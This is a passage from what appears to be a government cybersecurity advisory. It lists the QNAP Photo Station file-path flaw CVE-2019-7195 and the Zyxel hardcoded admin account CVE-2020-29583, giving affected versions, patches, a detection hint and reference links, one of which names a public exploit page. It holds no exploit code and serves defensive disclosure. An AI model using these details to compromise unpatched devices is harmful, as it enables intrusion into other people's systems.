<p><u><strong>Vulnerability Description</strong></u></p>

<p>This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Recommended Mitigations&nbsp;</strong></u></p>

<p>Update Photo Station to versions:&nbsp;</p>

<ul>
<li>QTS 4.4.1 Photo Station 6.0.3 and later</li>
<li>QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later</li>
<li>QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later</li>
<li>QTS 4.2.6 Photo Station 5.2.11 and later</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>N/A</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://www.qnap.com/zh-tw/security-advisory/nas-201911-25">https://www.qnap.com/zh-tw/security-advisory/nas-201911-25&nbsp;</a><br />
<a href="http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html">http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html</a></p>
</td>
</tr>
</tbody>
</table>

<p class="text-align-center">&nbsp;</p>

<p class="text-align-center"><em><strong>Table 16: Information on QNAP CVE-2019-7195</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; QNAP CVE-2019-7195&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Recommended Mitigations&nbsp;</strong></u></p>

<p>Update Photo Station to versions:&nbsp;</p>

<ul>
<li>QTS 4.4.1 Photo Station 6.0.3 and later</li>
<li>QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later</li>
<li>QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later</li>
<li>QTS 4.2.6 Photo Station 5.2.11 and later</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>N/A</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="https://www.qnap.com/zh-tw/security-advisory/nas-201911-25">https://www.qnap.com/zh-tw/security-advisory/nas-201911-25</a><br />
<a href="http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html">http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html</a></p>
</td>
</tr>
</tbody>
</table>

<p>&nbsp;</p>

<p class="text-align-center"><em><strong>Table 17: Information on Zyxel CVE-2020-29583</strong></em></p>

<table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 600px; height: 312px; margin-left: auto; margin-right: auto;">
<thead>
<tr>
<th scope="col">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Zyxel CVE-2020-29583&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CVSS 3.0: 9.8 (Critical)</th>
</tr>
</thead>
<tbody>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerability Description&nbsp;</strong></u></p>

<p>Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the SSH server or web interface with admin privileges.</p>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Recommended Mitigations&nbsp;</strong></u>
<ul>
<li>Download latest patch (4.60 Patch1 or newer)</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;"><u><strong>Detection Methods&nbsp;</strong></u>
<ul>
<li>Login attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>Vulnerable Technologies and Versions&nbsp;</strong></u></p>

<p>This vulnerability affects the following technologies and versions:</p>

<ul>
<li>ATP series running firmware ZLD V4.60</li>
<li>USG series running firmware ZLD V4.60</li>
<li>USG FLEX series running firmware ZLD V4.60</li>
<li>VPN series running firmware ZLD V4.60</li>
<li>NXC2500 running firmware V6.00 through V6.10</li>
<li>NXC5500 running firmware V6.00 through V6.10</li>
</ul>
</td>
</tr>
<tr>
<td scope="col" style="text-align: left;">
<p><u><strong>References&nbsp;</strong></u></p>

<p><a href="http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf">http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf</a><br />
<a href="https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release">https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release</a><br />
<a href="https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15">https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15</a><br />
<a href="https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html">https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html</a><br />
<a href="https://www.zyxel.com/support/CVE-2020-29583.shtml">https://www.zyxel.com/support/CVE-2020-29583.shtml</a><br />
<a href="https://www.zyxel.com/support/security_advisories.shtml">https://www.zyxel.com/support/security_advisories.shtml</a></p>
</td>
</tr>
</tbody>
</table>

<p>&nbsp;</p>
<h3>Revisions</h3>
<ul> <li>Initial Version: June 7, 2022</li> </ul>
<hr />
<div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p>
</div>

Scroll to Top